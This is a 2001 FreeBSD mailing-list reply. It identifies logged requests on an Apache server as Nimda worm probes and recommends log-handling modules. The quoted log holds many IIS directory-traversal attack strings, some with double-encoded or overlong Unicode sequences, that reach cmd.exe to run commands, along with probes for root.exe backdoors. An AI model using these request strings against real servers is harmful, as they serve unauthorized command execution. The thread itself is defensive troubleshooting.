Date: Tue, 13 Nov 2001 23:02:59 -0500 From: Louis LeBlanc <leblanc+freebsd@keyslapper.org> To: freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Do these errors mean my system is comprimised? Message-ID: <20011114040259.GC25941@keyslapper.org> In-Reply-To: <20011114040055.GB25941@keyslapper.org> References: <0111131938440F.60958@chip.wiegand.org> <20011114040055.GB25941@keyslapper.org>
next in thread | previous in thread | raw e-mail | index | archive | help
--hOcCNbCCxyk/YU74 Content-Type: text/plain; charset=unknown-8bit Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 11/13/01 11:00 PM, Louis LeBlanc sat at the `puter and typed: > On 11/13/01 07:38 PM, Chip sat at the `puter and typed: > > I found the following on my apache/freebsd/php/mysql server in my log a= fter=20 > > running analog - > > Looks like someone planted something that wants NT to work correctly - > > =20 > > 111: /scripts/..%255c../winnt/system32/cmd.exe > > 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir > > 106: /scripts/..%5c../winnt/system32/cmd.exe > > 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir > > 66: /scripts/root.exe > > 66: /scripts/root.exe?/c+dir > > 64: /MSADC/root.exe > > 64: /MSADC/root.exe?/c+dir > > 62: /c/winnt/system32/cmd.exe > > 62: /c/winnt/system32/cmd.exe?/c+dir > > 59: /d/winnt/system32/cmd.exe > > 59: /d/winnt/system32/cmd.exe?/c+dir > > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?= /c+dir > > 56:=20 > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../win= nt/system32/cmd.exe > > 56: =20 > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../win= nt/system32/cmd.exe?/c+dir > > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?= /c+dir > > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe > > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir > > 54: /scripts/winnt/system32/cmd.exe > > 54: /scripts/winnt/system32/cmd.exe?/c+dir > > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe > > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > > 54: /scripts/..%c0%af../winnt/system32/cmd.exe > > 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > > 51: /scripts/..%252f../winnt/system32/cmd.exe > > 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir >=20 >=20 > This is the footprint of the Nimda virus *trying* to infect your > system. You can find links to specific info on what Nimda tries to do > on Google, if you want to sort thru a million hits. You can also get > info on how an Apache installation can handle these (or not handle > them) at http://www.keyslapper.org/modules/ >=20 > Look for the Apache::Nimda page, even if you don't want to report it > to abuse and SecurityFocus, there are config ideas that will help you > reduce the impact on your log file size. >=20 > Also, look for the Apache::404 module. It will handle those misses and > notify you via email - once per period for each URL. It can help you > keep track of Nimda's impact on your server, and keep dead links tied > up. >=20 > Enough of the shameless plug. Check it out. >=20 Sorry, I forgot to answer your actual question. No, you've not been compromised. At least this is no indication. Nimda is strictly a MS gift to the world. Lou --=20 Louis LeBlanc leblanc@keyslapper.org Fully Funded Hobbyist, KeySlapper Extrordinaire :) http://www.keyslapper.org =D4=BF=D4=AC aphorism, n.: A concise, clever statement. afterism, n.: A concise, clever statement you don't think of until too late. -- James Alexander Thom --hOcCNbCCxyk/YU74 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE78ezzeAPWYrNkRWIRArjlAJwOs5GM2M9M8a31+wIrci5+gJ5/VACcDhPv Vudh37VCQlIIkInHMv1u8fQ= =WT7j -----END PGP SIGNATURE----- --hOcCNbCCxyk/YU74-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011114040259.GC25941>